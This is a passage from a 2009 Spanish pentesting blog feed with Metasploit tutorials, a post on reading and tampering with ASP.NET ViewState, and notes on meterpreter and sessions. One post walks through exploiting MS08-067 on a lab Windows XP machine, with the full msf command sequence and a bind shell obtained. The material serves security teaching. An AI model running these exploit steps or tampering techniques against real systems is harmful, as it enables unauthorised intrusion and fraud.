<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
svchost.exe pid: 1108<br />
Command line: C:\WINDOWS\System32\svchost.exe -k netsvcs</p>
<p>  Base        Size      Version         Path<br />
l<br />
  0&#215;76f80000  0&#215;6000    5.01.2600.2180  C:\WINDOWS\System32\rasadhlp.dll<br />
  0&#215;754e0000  0xa9000   5.01.2600.2180  C:\WINDOWS\System32\RASDLG.dll<br />
  0&#215;77b10000  0&#215;22000   5.01.2600.2180  C:\WINDOWS\system32\Apphelp.dll<br />
  0&#215;50e60000  0xc000    7.02.6001.0788  C:\WINDOWS\system32\wups2.dll<br />
  0&#215;10000000  0&#215;17000                   C:\WINDOWS\system32\metsrv.dll<br />
  0&#215;76bb0000  0xb000    5.01.2600.2180  C:\WINDOWS\System32\PSAPI.DLL<br />
  0&#215;71ce0000  0&#215;1c000   6.00.2900.2180  C:\WINDOWS\system32\actxprxy.dll<br />
  0&#215;75590000  0&#215;9d000   5.01.2600.2180  C:\WINDOWS\system32\netcfgx.dll</p>
<p></em></p>
<p>Como conclusión resaltar que si lo que se pretende es simplemente evidenciar que un sistema es vulnerable quizá no sea necesario el meterpreter, pero si lo que se busca es comprometer el sistema haciendo el menor ruido posible, y utilizarlo como base para realizar futuros ataques o mantener el compromiso del mismo durante un largo periodo de tiempo meterpreter hará las delicias del intruso.</p>
<p><strong>Referencias:</strong></p>
<p><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5ub2xvZ2luLm9yZy9Eb3dubG9hZHMvUGFwZXJzL21ldGVycHJldGVyLnBkZg==">http://www.nologin.org/Downloads/Papers/meterpreter.pdf</a><br />
<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5sZWFybnNlY3VyaXR5b25saW5lLmNvbS92aWQvTVNGMy1tZXQvTVNGMy1tZXQuaHRtbA==">http://www.learnsecurityonline.com/vid/MSF3-met/MSF3-met.html</a></p>
<p class="akst_link"><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8/cD0zMjMmYW1wO2Frc3RfYWN0aW9uPXNoYXJlLXRoaXM="  title=\"E-mail this, post to del.icio.us, etc.\" id=\"akst_link_323\" class=\"akst_share_link\" rel=\"nofollow\">Compártelo</a>
</p> <img src="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?view=1&post_id=323" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://dmedianero.byethost15.com/blog/2009/03/metasploit-meterpreter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Seguridad sobre ViewState en ASP.net</title>
		<link>http://dmedianero.byethost15.com/blog/2009/02/seguridad-sobre-viewstate-en-aspnet/</link>
		<comments>http://dmedianero.byethost15.com/blog/2009/02/seguridad-sobre-viewstate-en-aspnet/#comments</comments>
		<pubDate>Fri, 27 Feb 2009 12:01:57 +0000</pubDate>
		<dc:creator>m313</dc:creator>
				<category><![CDATA[Pentest]]></category>
		<category><![CDATA[asp.net]]></category>
		<category><![CDATA[burp suite]]></category>
		<category><![CDATA[viewstate]]></category>

		<guid isPermaLink="false">http://dmedianero.byethost15.com/blog/?p=295</guid>
		<description><![CDATA[ViewState es una forma de trasnmitir datos ofuscados desde los clientes a la aplicación web en ASP.net. Básisamente consiste en un campo oculto que contiene un chorro largo de datos aparentemente ilegibles. Es interesante porque está muy extendido su uso, no obstante este parámetro es creado por defecto en todas las aplicaciones ASP.net.
El uso habitual [...]]]></description>
			<content:encoded><![CDATA[<p>ViewState es una forma de trasnmitir datos ofuscados desde los clientes a la aplicación web en ASP.net. Básisamente consiste en un campo oculto que contiene un chorro largo de datos aparentemente ilegibles. Es interesante porque está muy extendido su uso, no obstante este parámetro es creado por defecto en todas las aplicaciones ASP.net.</p>
<p>El uso habitual es permitir <em>estado </em>sobre http ya que el protocolo no lo contempla.<br />
Desde el punto de vista de la seguridad es importante saber que los datos no se envían por defecto cifrados (aunque como veremos posteriormente pueden configurarse así) sino codificados en base64. Es aquí donde tenemos el primer punto de ataque desde el punto de vista de seguridad. Inspeccionar este parámetro puede proporcionarnos información sensible.</p>
<p>Para leer los datos podemos hacer tampering de parametros con cualquier proxy y descodificarlo en cualquier descodificador que soporte base64 (todos) aunque esta opción es un poco tediosa. Más de uno ya se ha pegado con esto antes y gracias a ello tenemos varias herramientas que nos permiten ver estos datos de manera sencilla, voy a nombrar dos:</p>
<p><strong>1. <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3BvcnRzd2lnZ2VyLm5ldC9zdWl0ZS8=">Burp Suite</a>.</strong> Esta gran herramienta ofrece entre otras muchas cosas la decodificación automática del ViewState, sin siquiera hacer nada, solo navegar a través del proxy, como podemos apreciar en la siguiente imágen:<br />
<center><br />
<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2ltZzIyLmltYWdlc2hhY2sudXMvbXkucGhwP2ltYWdlPTI0NzcyOTgwLmpwZw==" target=\"_blank\"><img src="http://img22.imageshack.us/img22/2567/24772980.th.jpg" border="0" alt="Free Image Hosting at www.ImageShack.us" /></a></center></p>
<p>Como apreciamos en la imagen hay una pestaña dedicada al ViewState en la que podemos ver su contenido. Un detalle importante es que esta aplicación ya detecta si está activada la opción MAC enabled, que veremos a continuación.</p>
<p><strong>2. <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2FzaGlzaHdhcmUuY29tL1ZpZXdTdGF0ZVBlZWtlci5zaHRtbA==">ViewState Decoder</a>.</strong> Este plugin para firefox nos permite ver los datos de manera integrada en el navegador, sin necesidad de proxys, como podemos ver en la siguiente imagen:<br />
<center><br />
<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2ltZzIyLmltYWdlc2hhY2sudXMvbXkucGhwP2ltYWdlPTIzOTY2MTE4LmpwZw==" target=\"_blank\"><img src="http://img22.imageshack.us/img22/1338/23966118.th.jpg" border="0" alt="Free Image Hosting at www.ImageShack.us" /></a></center></p>
<p>Bien ya tenemos el primer punto de ataque, ver datos sensibles. Imaginemos por ejemplo que uno de esos datos es el precio de un artículo en una página de venta de libros. El segundo punto de ataque es modificar dicho parámetro para engañar a la aplicación. ¿Es esto posible? La respuesta es sí. Tan simple como interceptar el parámetro, descodificarlo, modificarlo, volverlo a codificar y enviarlo.</p>
<p>Leyendo esto podemos pensar que es un mecanismo tremendamente inseguro de transmisión de datos aunque en realidad no es así, primero porque tiene opciones para asegurarlo y segundo porque en esencia está pensado para trasmitir el estado de la página, opciones de idioma, etc y no datos sensibles.<br />
De todas formas aplicando las opciones de seguridad sí pueden transmitirse datos de manera segura y cifrada, esas opciones son las siguientes:</p>
<p><strong>1. ViewState MAC</strong>. Este sistema permite tras cada dato introducido en el parámetro añadir su firma hash. de esta manera si el servidor recibe un dato y su firma no coincide con el dato recibimos el siguiente error:<br />
<center><br />
<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2ltZzUxMC5pbWFnZXNoYWNrLnVzL215LnBocD9pbWFnZT0xNzA5MDMyMC5qcGc=" target=\"_blank\"><img src="http://img510.imageshack.us/img510/4941/17090320.th.jpg" border="0" alt="Free Image Hosting at www.ImageShack.us" /></a></center></p>
<p>ViewState MAC puede activarse con la opción <em>EnableViewStateMac</em> en el fichero de configuración.</p>
<p><strong>2. Cifrado del ViewState</strong>. Es posible, su uso no está muy extendido pero la funcionalidad está disponible. Básicamente se realiza añadiendo el siguiente código al fichero de configuración:</p>
<pre class="codeSample"><em>&lt;configuration&gt;

   &lt;system.web&gt;

      &lt;machineKey validation="3DES" /&gt;

   &lt;/system.web&gt;

&lt;/configuration&gt;</em></pre>
<p>Para más información sobre el cifrado del ViewState os remito a <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3NwYW5pc2gvbXNkbi9hcnRpY3Vsb3MvYXJjaGl2by8yNzAzMDYvdm9pY2VzL3ZpZXdTdGF0ZUVuY3J5cC5tc3B4">la siguiente web de Microsoft</a>.</p>
<p>En resumen, es un punto de ataque que debe inspeccionarse ante páginas en ASP. Lo primero es ver si los datos no están cifrados para ver sus contenidos y valorar si son sensibles o aportan información adicional sobre la aplicación. En caso afirmativo intentar la modificación de los mismos.</p>
<p class="akst_link"><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8/cD0yOTUmYW1wO2Frc3RfYWN0aW9uPXNoYXJlLXRoaXM="  title=\"E-mail this, post to del.icio.us, etc.\" id=\"akst_link_295\" class=\"akst_share_link\" rel=\"nofollow\">Compártelo</a>
</p> <img src="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?view=1&post_id=295" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://dmedianero.byethost15.com/blog/2009/02/seguridad-sobre-viewstate-en-aspnet/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Metasploit: Sesiones y otras hierbas</title>
		<link>http://dmedianero.byethost15.com/blog/2009/02/metasploit-sesiones-y-otras-hierbas/</link>
		<comments>http://dmedianero.byethost15.com/blog/2009/02/metasploit-sesiones-y-otras-hierbas/#comments</comments>
		<pubDate>Thu, 19 Feb 2009 11:17:27 +0000</pubDate>
		<dc:creator>m313</dc:creator>
				<category><![CDATA[Pentest]]></category>
		<category><![CDATA[ddos]]></category>
		<category><![CDATA[dos]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[sesiones]]></category>
		<category><![CDATA[sessions]]></category>

		<guid isPermaLink="false">http://dmedianero.byethost15.com/blog/?p=276</guid>
		<description><![CDATA[Hoy toca post ligerito sobre Metasploit, que ando bastante liado, mucho trabajo, mucho estudio y esta tarde a las FIST.
En algunas ocasiones puede darse el caso de que tengamos muchas máquinas explotadas con sesiones, shells, etc. Imaginemos el caso de que tenemos en una pestaña la consola mfs con un Windows explotado y ejecutando un [...]]]></description>
			<content:encoded><![CDATA[<p>Hoy toca post ligerito sobre Metasploit, que ando bastante liado, mucho trabajo, mucho estudio y esta tarde a las <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5maXN0Y29uZmVyZW5jZS5vcmcv">FIST</a>.</p>
<p>En algunas ocasiones puede darse el caso de que tengamos muchas máquinas explotadas con sesiones, shells, etc. Imaginemos el caso de que tenemos en una pestaña la consola mfs con un Windows explotado y ejecutando un comando que no queremos interrumpir. ¿Tengo que lanzar de nuevo el exploit para conseguir una nueva shell? La respuesta es no. Para eso están las sesiones.</p>
<p>Las sesiones pueden verse desde la consola mfs con el comando &#8220;<em>sessions -l</em>&#8220;. Cada sesión abierta tiene un identificador único. Veamos el ejemplo:</p>
<p><em>msf &gt; sessions -l</em></p>
<p><em>Active sessions<br />
===============</em></p>
<p><em>Id  Description    Tunnel<br />
&#8211;  &#8212;&#8212;&#8212;&#8211;    &#8212;&#8212;<br />
2   Command shell  192.168.60.1:5099 -&gt; 192.168.60.130:4444 </em></p>
<p>Como podemos apreciar tenemos una sesión abierta con identificador 2. Normalmente esto significa que tendremos otra pestaña en nuestra consola con la máquina explotada.</p>
<p>Si queremos acceder a la shell para ejecutar otra serie de comandos simplemente ejecutamos &#8220;<em>sessions -i 2</em>&#8220;:</p>
<p>msf &gt; sessions -i 2<br />
[*] Starting interaction with 2&#8230;</p>
<p>C:\WINDOWS\system32&gt;</p>
<p>Las opciones del comando &#8220;<em>sessions</em>&#8221; son muy descriptivas:</p>
<p><em>msf &gt; sessions -h<br />
Usage: session [options]</em></p>
<p><em>Active session manipulation and interaction.</em></p>
<p><em>OPTIONS:</em></p>
<p><em>-d &lt;opt&gt;  Detach an interactive session<br />
-h        Help banner.<br />
-i &lt;opt&gt;  Interact with the supplied session identifier.<br />
-k &lt;opt&gt;  Terminate session.<br />
-l        List all active sessions.<br />
-q        Quiet mode.<br />
-v        List verbose fields.</em></p>
<p><strong>Remite el ataque DDOS sobre Metasploit.</strong></p>
<p>Por otro lado comentar que ha remitido el ataque DOS sobre la web oficial, si queréis informaros paso a paso de cómo lo llevaron hay 3 entradas en el blog donde lo comentan:</p>
<p><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2Jsb2cubWV0YXNwbG9pdC5jb20vMjAwOS8wMi9wYXRoZXRpYy1kZG9zLXZzLXNlY3VyaXR5LXNpdGVzLmh0bWw=">Round 1</a>.</p>
<p><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2Jsb2cubWV0YXNwbG9pdC5jb20vMjAwOS8wMi9wYXRoZXRpYy1kZG9zLXZzLW1ldGFzcGxvaXQtcm91bmQtMi5odG1s">Round 2</a>.</p>
<p><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2Jsb2cubWV0YXNwbG9pdC5jb20vMjAwOS8wMi9wYXRoZXRpYy1kZG9zLXZzLW1ldGFzcGxvaXQtcm91bmQtMy5odG1s">Round 3</a>.</p>
<p>Lo que no cuentan en sus post es que cierto día entre estos ataques se dejaron activado el phpinfo y un servidor dispone de toda la información referente a opciones php, mysql, kernel, etc de la máquina que soporta el servidor web de <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5tZXRhc3Bsb2l0LmNvbS8=">Metasploit.com</a>. Evidentemente no lo divulgaré <img src='http://dmedianero.byethost15.com/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p class="akst_link"><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8/cD0yNzYmYW1wO2Frc3RfYWN0aW9uPXNoYXJlLXRoaXM="  title=\"E-mail this, post to del.icio.us, etc.\" id=\"akst_link_276\" class=\"akst_share_link\" rel=\"nofollow\">Compártelo</a>
</p> <img src="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?view=1&post_id=276" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://dmedianero.byethost15.com/blog/2009/02/metasploit-sesiones-y-otras-hierbas/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Metasploit: Uso básico y ejecución de exploits</title>
		<link>http://dmedianero.byethost15.com/blog/2009/02/metasploit-uso-basico-y-ejecucion-de-exploits/</link>
		<comments>http://dmedianero.byethost15.com/blog/2009/02/metasploit-uso-basico-y-ejecucion-de-exploits/#comments</comments>
		<pubDate>Fri, 13 Feb 2009 11:47:30 +0000</pubDate>
		<dc:creator>m313</dc:creator>
				<category><![CDATA[Pentest]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[metasploit]]></category>

		<guid isPermaLink="false">http://dmedianero.byethost15.com/blog/?p=269</guid>
		<description><![CDATA[Una vez que hemos hablado sobre Metasploit y lo hemos instalado y actualizado  llega el momento de ponerlo en funcionamiento. Hoy vamos a ver el manejo básico de la herramienta y de paso lanzaremos un exploit contra una maquina vulnerable, todo en entorno de laboratorio.
::Manejo Basico::
Para todas las pruebas vamos a utilizar la consola mfs. [...]]]></description>
			<content:encoded><![CDATA[<p>Una vez que hemos hablado sobre Metasploit y lo hemos instalado y actualizado  llega el momento de ponerlo en funcionamiento. Hoy vamos a ver el manejo básico de la herramienta y de paso lanzaremos un exploit contra una maquina vulnerable, todo en entorno de laboratorio.</p>
<p><strong>::Manejo Basico::</strong><br />
Para todas las pruebas vamos a utilizar la consola mfs. Desde Unix accedemos a ella mediante el binario &#8220;<em>mfsconsole</em>&#8220;. Desde Windows podemos acceder mediante la GUI, y una vez abierta haciendo click en <em>Window-&gt;Console</em> o con la combinación de teclas <em>Ctrl+o</em>.<br />
Lo primero que vemos en la consola es un resumen de los exploits, payloads, encoders, etc  cargados en el entorno:</p>
<p><em> ____________<br />
&lt; metasploit &gt;<br />
&#8212;&#8212;&#8212;&#8212;<br />
\   ,__,<br />
\  (oo)____<br />
(__)    )\<br />
||&#8211;|| *</p>
<p>=[ msf v3.2-release<br />
+ -- --=[ 262 exploits - 117 payloads<br />
+ -- --=[ 17 encoders - 6 nops<br />
=[ 46 aux</em></p>
<p>El primer comando que deberíamos probar es "<em>help</em>", que nos muestra los comandos disponibles y una breve explicación de los mismos:</p>
<p><img class="aligncenter size-full wp-image-270" title="mfs_help" src="http://dmedianero.byethost15.com/blog/wp-content/uploads/2009/02/mfs_help.jpg" alt="mfs_help" width="536" height="434" /></p>
<p>Por otro lado tenemos un sistema víctima a auditar. En nuestro caso se trata de un sistema virtual Windows XP que me ha proporcionado <strong>spanic</strong>. Dicho sistema es vulnerable al "<a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3RlY2huZXQvc2VjdXJpdHkvQnVsbGV0aW4vTVMwOC0wNjcubXNweA==">Microsoft Security Bulletin MS08-067 – Critical</a>", sobre el que <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8yMDA4LzEwL21zMDgtMDY3LXJlY29waWxhY2lvbi1kZS1yZWN1cnNvcy8=">ya hablé en su dia</a>.<br />
Nos hemos saltado un paso importante: identificar el sistema vulnerable. Habitualmente nadie usa Metasploit para ello aunque como veremos en futuros post es posible realizarlo desde él o importando directamente informes de aplicaciones como <a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL3d3dy5uZXNzdXMub3JnL25lc3N1cy8=">Nessus</a>.<br />
Para el caso que nos ocupa simplemente tenemos una máquina vulnerable en la IP <em>192.168.60.130</em> y nuestra máquina con el Metasploit instalado y la consola esperando a que explotemos la vulnerabilidad de la víctima.</p>
<p>Volvemos pues a la consola mfs. Es posible navegar los exploits, encoders, payloads, etc con el comando "<em>show</em>". Por ejemplo para listar los exploits disponibles utilizaremos el comando "<em>show exploits</em>", que nos da el siguiente resultado (recortado para un mejor entendimiento):<br />
<em><br />
....<br />
windows/smb/ms06_066_nwwks               Microsoft Services MS06-066 nwwks.dll<br />
windows/smb/ms08_067_netapi              Microsoft Server Service Relative Path Stack Corruption<br />
windows/smb/msdns_zonename               Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)<br />
....</em></p>
<p>Como podemos apreciar el framework tiene disponible un exploit para la vulnerabilidad que queremos explotar (ms08_067_netapi).<br />
Para situarnos en el exploit que queremos lanzar utilizamos el comando "<em>use</em>". Por ejemplo nosotros introduciremos el comando "<em>use windows/smb/ms08_067_netapi</em>". Como vemos el promt ha cambiado:</p>
<p><em> msf &gt; use windows/smb/ms08_067_netapi<br />
msf exploit(ms08_067_netapi) &gt; </em></p>
<p>Ahora necesitamos saber qué opciones permite este exploit y cómo configurarlo, seleccionar el objetivo, etc. En Metasploit esto se realiza mediante la modificación de variables asociadas a cada exploit. Para ver que opciones nos permite configurar un exploit determinado utilizamos el comando "<em>info</em>" (recortado para un mejor entendimiento):</p>
<p><em> msf exploit(ms08_067_netapi) &gt; info</em></p>
<p><em>Name: Microsoft Server Service Relative Path Stack Corruption<br />
Version: 5888<br />
Platform: Windows<br />
Privileged: Yes<br />
License: Metasploit Framework License (BSD)</em></p>
<p><em>Provided by:<br />
hdm &lt;hdm@metasploit.com&gt;<br />
Brett Moore &lt;brett.moore@insomniasec.com&gt;</em></p>
<p><em>Available targets:<br />
Id  Name<br />
--  ----<br />
0   Automatic Targeting<br />
1   Windows 2000 Universal<br />
2   Windows XP SP0/SP1 Universal<br />
3   Windows XP SP2 English (NX)<br />
4   Windows XP SP3 English (NX)<br />
.......</em></p>
<p><em>Basic options:<br />
Name     Current Setting  Required  Description<br />
----     ---------------  --------  -----------<br />
RHOST                     yes       The target address<br />
RPORT    445              yes       Set the SMB service port<br />
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</em></p>
<p><em>Payload information:<br />
Space: 400<br />
Avoid: 8 characters</em></p>
<p><em>Description:<br />
.....</em></p>
<p><em>References:<br />
.....<br />
</em><br />
Como podemos apreciar tenemos disponibles opciones para seleccionar el objetivo (RHOST), el puerto de smb (RPORT) y el pipe utilizado (SMBPIPE) y se nos informa de si son necesarios u opcionales. También hay abundante información acerca de sobre qué sistemas está probado el exploit, descripción del mismo, referencias, etc.</p>
<p>Para aplicar las opciones utilizamos el comando "<em>set</em>". Este comando recibe como primer parametro la opción y como segundo el valor a aplicar, separados por espacios. Esto quiere decir que si el valor de una variable tiene espacios debemos introducirlo entre comillas dobles. En nuestro caso estableceríamos el objetivo, puerto y pipe con la siguiente secuencia:</p>
<p><em> msf exploit(ms08_067_netapi) &gt; set RHOST 192.168.60.130<br />
RHOST =&gt; 192.168.60.130<br />
msf exploit(ms08_067_netapi) &gt; set RPORT 445<br />
RPORT =&gt; 445<br />
msf exploit(ms08_067_netapi) &gt; set SMBPIPE BROWSER<br />
SMBPIPE =&gt; BROWSER</em></p>
<p>Ahora vamos a configurar el Payload. Vamos a utilizar uno sencillo que sirve para darnos acceso a una linea de comandos en la máquina víctima, si bien hay algunos muy elaborados como por ejemplo la inyección de dll's para conectarnos a la víctima por VNC.<br />
Para ver los payloads disponibles tenemos la opción "show payloads", para elegir el que queremos usamos el comando "<em>set</em>". En nuestro caso:</p>
<p><em> msf exploit(ms08_067_netapi) &gt; set payload windows/shell_bind_tcp<br />
payload =&gt; windows/shell_bind_tcp</em></p>
<p>Ahora con el comando "<em>show options</em>" podemos comprobar que los datos se han introducido correctamente:</p>
<p><em> msf exploit(ms08_067_netapi) &gt; show options</em></p>
<p><em>Module options:</em></p>
<p><em>Name     Current Setting  Required  Description<br />
----     ---------------  --------  -----------<br />
RHOST    192.168.60.130   yes       The target address<br />
RPORT    445              yes       Set the SMB service port<br />
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</em></p>
<p><em>Payload options (windows/shell_bind_tcp):</em></p>
<p><em>Name      Current Setting  Required  Description<br />
----      ---------------  --------  -----------<br />
EXITFUNC  thread           yes       Exit technique: seh, thread, process<br />
LPORT     4444             yes       The local port<br />
RHOST     192.168.60.130   no        The target address</em></p>
<p><em>Exploit target:</em></p>
<p><em>Id  Name<br />
--  ----<br />
0   Automatic Targeting </em></p>
<p>En este caso solo tenemos un sistema víctima posible (con ID 0), en caso de tener varios elegiríamos con "<em>set target N</em>".<br />
Asímismo algunos exploits permiten la comprobación de la vulnerabilidad sin ejecutarla mediante el comando "<em>check</em>". Este no es el caso por lo que solo nos queda lanzar el exploit, para ello utilizamos el comando "<em>exploit</em>":</p>
<p><em>msf exploit(ms08_067_netapi) &gt; exploit<br />
[*] Started bind handler<br />
[*] Automatically detecting the target&#8230;<br />
[*] Fingerprint: Windows XP Service Pack 2 &#8211; lang:Spanish<br />
[*] Selected Target: Windows XP SP2 Spanish (NX)<br />
[*] Triggering the vulnerability&#8230;<br />
[*] Command shell session 1 opened (192.168.60.1:5953 -&gt; 192.168.60.130:4444)</em></p>
<p><em>Microsoft Windows XP [Versi?n 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.</em></p>
<p>El sistema es nuestro <img src='http://dmedianero.byethost15.com/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Lo comprobamos ejecutando comandos sobre la shell que acabamos de obtener:</p>
<p><em>C:\WINDOWS\system32&gt;ipconfig /all<br />
ipconfig /all</em></p>
<p><em>Configuraci?n IP de Windows</em></p>
<p><em>Nombre del host . . . . . . . . . : spanic-08bcbab7<br />
Sufijo DNS principal  . . . . . . :<br />
Tipo de nodo. . . . . . . . . . . : mixto<br />
Enrutamiento habilitado. . . . . .: No<br />
Proxy WINS habilitado. . . . .    : No<br />
Lista de b?squeda de sufijo DNS:    localdomain</em></p>
<p><em>Adaptador Ethernet Conexi?n de ?rea local          :</em></p>
<p><em>Sufijo de conexi?n espec?fica DNS : localdomain<br />
Descripci?n. . . . . . . . . . .  : VMware Accelerated AMD PCNet Adapter<br />
Direcci?n f?sica. . . . . . . . . : 00-0C-29-32-66-B3<br />
DHCP habilitado. . . . . . . . .  : No<br />
Autoconfiguraci?n habilitada. . . : S?<br />
Direcci?n IP. . . . . . . . . . . : 192.168.60.130<br />
M?scara de subred . . . . . . . . : 255.255.255.0<br />
Puerta de enlace predeterminada   : 192.168.60.2<br />
Servidor DHCP . . . . . . . . . . : 192.168.60.254<br />
Servidores DNS . . . . . . . . . .: 192.168.60.2<br />
Servidor WINS principal . . . . . : 192.168.60.2<br />
Concesi?n obtenida . . . . . . .  : mi?rcoles, 11 de febrero de 2009 11:49:35<br />
Concesi?n expira . . . . . . . . .: mi?rcoles, 11 de febrero de 2009 12:19:35</em></p>
<p><em>C:\WINDOWS\system32&gt;</em><br />
A destacar que hemos introducido las opciones para un objetivo concreto pero ¿y si tengo una lista de 50 pc&#8217;s con la misma vulnerabilidad y quiero explotarlos todos? ¿tengo que ir uno por uno ? Evidentemente la respuesta es no. En Metasploit podemos definir variables globales.<br />
Para volver a la pantalla inicial tenemos el comando &#8220;<em>back</em>&#8220;. Una vez en la pantalla inicial podemos definir variables globales con el comando &#8220;<em>setg</em>&#8220;. Si por ejemplo queremos definir globalmente que el payload sea el que utilizamos en esta ocasión utilizamos:</p>
<p><em> msf &gt; setg payload windows/shell_bind_tcp<br />
payload =&gt; windows/shell_bind_tcp</em><em></em></p>
<p>Después con &#8220;setg&#8221; comprobamos qué variables globales tenemos definidas con sus correspondientes valores:</p>
<p><em>msf &gt; setg</em></p>
<p><em>Global<br />
======</em></p>
<p><em>Name     Value<br />
&#8212;-     &#8212;&#8211;<br />
payload  windows/shell_bind_tcp </em></p>
<p>Si queremos guardar nuestras variables globales para que se queden incluso después de cerrar el Metasploit usamos el comando &#8220;<em>save</em>&#8220;:</p>
<p><em> msf &gt; save<br />
Saved configuration to: C:\Documents and Settings\dmedianero\Datos de programa/.msf3/config</em></p>
<p>Como podemos ver el framework nos informa de dónde queda guardada dicha configuración, es un fichero de texto en formato simple.<br />
Hasta aqui lo que probablemente todos los que usáis Metasploit hayáis utilizado habitualmente, a partir de ahora intentaré poco a poco escribir sobre usos menos comunes y muy utiles como el manejo de jobs, uso otros payloads, BBDD, etc.</p>
<p class="akst_link"><a href="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?url=aHR0cDovL2RtZWRpYW5lcm8uYnlldGhvc3QxNS5jb20vYmxvZy8/cD0yNjkmYW1wO2Frc3RfYWN0aW9uPXNoYXJlLXRoaXM="  title=\"E-mail this, post to del.icio.us, etc.\" id=\"akst_link_269\" class=\"akst_share_link\" rel=\"nofollow\">Compártelo</a>
</p> <img src="http://dmedianero.byethost15.com/blog/wp-content/plugins/feed-statistics.php?view=1&post_id=269" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://dmedianero.byethost15.com/blog/2009/02/metasploit-uso-basico-y-ejecucion-de-exploits/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Introducción a Metasploit</title>
		<link>http://dmedianero.byethost15.com/blog/2009/02/introduccion-a-metasploit/</link>
		<comments>http://dmedianero.byethost15.com/blog/2009/02/introduccion-a-metasploit/#comments</comments>
		<pubDate>Tue, 10 Feb 2009 12:42:49 +0000</pubDate>
		<dc:creator>m313</dc:creator>
				<category><![CDATA[Pentest]]></category>
		<category><![CDATA[metasploit]]></category>

		<guid isPermaLink="false">http://dmedianero.byethost15.com/blog/?p=257</guid>
		<description><![CDATA[Metasploit es un framework muy conocido aunque si le preguntas a la gente la mayor parte lo usa únicamente para lanzar alguno de los exploits que tiene.

Sobra decir que este entorno de trabajo sirve para unas cuantas cosas más, muchas de ellas interesantes y muy desconocidas.
En una serie de post que tengo en mente ir [...]]]></description>
			<content:encoded><![CDATA[<p>Metasploit es un framework muy conocido aunque si le preguntas a la gente la mayor parte lo usa únicamente para lanzar alguno de los exploits que tiene.</p>
<p><img class="alignleft" title="Metasploit" src="http://www.metasploit.org/images/hax_small.jpg" alt="" width="300" height="215" /><br />
Sobra decir que este entorno de trabajo sirve para unas cuantas cosas más, muchas de ellas interesantes y muy desconocidas.<br />
En una serie de post que tengo en mente ir escribiendo (ya sabéis de mi incostancia para escribir asique no esperéis ni siquiera uno semanal) me propongo ir poco a poco descubriendo los entresijos del uso de esta gran herramienta, paradógicamente tan conocida como desconocida.<br />
En esta primera introducción simplemente comentaré qué es, cómo obtenerlo, modos de ejecución, como actualizarla, etc. Vamos a ello:</p>
<p><strong>::Qué es::</strong><br />
Es un entorno de trabajo desarrollado en Ruby que permite auditar y explotar sistemas y redes. Es muy importante señalar que su principal característica es la de explotar, y es por ella que es una herramienta mundialmente conocida.</p>
<p>De cara al usuario consta básicamente de 5 módulos:</p>
